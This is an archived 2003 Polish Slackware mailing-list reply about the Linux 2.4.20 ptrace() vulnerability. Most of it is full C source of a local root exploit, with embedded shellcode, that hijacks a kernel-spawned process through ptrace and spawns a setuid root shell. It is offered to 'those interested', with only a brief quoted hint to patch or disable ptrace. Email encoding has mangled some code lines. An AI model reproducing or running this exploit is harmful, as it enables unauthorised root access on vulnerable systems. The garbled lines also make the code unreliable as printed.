[ SlackList ] [ WkikiSlack ]Re: exploit 2.4.20

From: Wojciech Potyka <wojtek@netprovidence.com>
Date: Sat Apr 12 2003 - 01:03:47 CEST
[slacklist] Re: exploit 2.4.20

Tak to ta dziura z ptrace(),
Dla zainteresowanych:

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
 "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
 "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
 "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
 "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
 "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
 perror(msg);
 kill(parent, SIGKILL);
 kill(child, SIGKILL);
 kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
 char buf[MAXPATHLEN + CODE_SIZE];
 unsigned long * src;
 int i, len;

 memcpy(buf, cliphcode, CODE_SIZE);
 len = readlink("/proc/self/exe", = buf + CODE_SIZE, MAXPATHLEN - 1);
 if (len == -1)
  fatal("[-] Unable to read = /proc/self/exe");

 len += CODE_SIZE + 1;
 buf[len] = '\0';

 src = (unsigned long*) buf;
 for (i = 0; i < len; i += 4)
  if (ptrace(PTRACE_POKETEXT, victim, dst++, = *src++) == -1)
   fatal("[-] Unable to write = shellcode");
}

void sigchld(int signo)
{
 struct user_regs_struct regs;

 if (gotchild++ == 0)
  return;

 fprintf(stderr, "[+] Signal =

 if (ptrace(PTRACE_GETREGS, victim, NULL, = &regs) == -1)
  fatal("[-] Unable to read = registers");

 fprintf(stderr, "[+] Shellcode placed at = 0x%08lx\n", regs.eip);

 putcode((unsigned long *)regs.eip);

 fprintf(stderr, "[+] Now wait for suid = shell...\n");

 if (ptrace(PTRACE_DETACH, victim, 0, 0) == = -1)
  fatal("[-] Unable to detach from =

 exit(0);
}

void sigalrm(int signo)
{
 errno = ECANCELED;
 fatal("[-] Fatal error");
}

void do_child(void)
{
 int err;

 child = getpid();
 victim = child + 1;

 signal(SIGCHLD, sigchld);

 do
  err = ptrace(PTRACE_ATTACH, victim, 0, = 0);
 while (err == -1 && errno == = ESRCH);

 if (err == -1)
  fatal("[-] Unable to = attach");

 fprintf(stderr, "[+] Attached to = %d\n", victim);
 while (!gotchild) ;
 if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == = -1)
  fatal("[-] Unable to setup syscall = trace");
 fprintf(stderr, "[+] Waiting for = signal\n");

 for(;;);
}

void do_parent(char * progname)
{
 struct stat st;
 int err;
 errno = 0;
 socket(AF_SECURITY, SOCK_STREAM, 1);
 do {
  err = stat(progname, &st);
 } while (err == 0 && (st.st_mode = & S_ISUID) != S_ISUID);

 if (err == -1)
  fatal("[-] Unable to stat = myself");

 alarm(0);
 system(progname);
}

void prepare(void)
{
 if (geteuid() == 0) {
  initgroups("root", 0);
  setgid(0);
  setuid(0);
  execl(_PATH_BSHELL, _PATH_BSHELL, = NULL);
  fatal("[-] Unable to spawn = shell");
 }
}

int main(int argc, char ** argv)
{
 prepare();
 signal(SIGALRM, sigalrm);
 alarm(10);

 parent = getpid();
 child = fork();
 victim = child + 1;

 if (child == -1)
  fatal("[-] Unable to fork");

 if (child == 0)
  do_child();
 else
  do_parent(argv[0]);

 return 0;
}


> Dnia pią 11. kwiecień 2003 18:55, = napisałeś:
> moglbys dokladnie napisac jak to zrobic
>
> Poochini
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > Dnia pią 11. kwietnia 2003 19:13, = napisałeś:
> > > Pytanie na co by tu zmienic 2.4.20 = uzywa ktos czegos lepszego ?
> >
> > Pewnie chodzi o ptrace(), patch albo = wyłacz ptrace()
> >
> > Pozdrawiam.
> > - --
> > =[ Rafał 'kacper' Jeżak && = kacper(at)slubice(dot)biz
> > =[ GG: 826971 PGP: http://www.kacper.org/kacper.gp= g
> > =[ www.kacper.org && = www.slack.com.pl && www.linux.slubice.biz
> > =[ Z Windowsa na Linuksa ciężko się = przechodzi, ale powrót jest
niemożliwy.
> > =[ [C. Bańkowski]
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.2.1 (GNU/Linux)
> >
> > =
> > DQZigHD4GT9NGOgTutVB+tY=
> > =C0Xs
> > -----END PGP SIGNATURE-----
>
>
>

Received on Sat Feb 21 03:36:10 2004
This archive was generated by hypermail 2.1.8. Wyprawa Shackleton 2014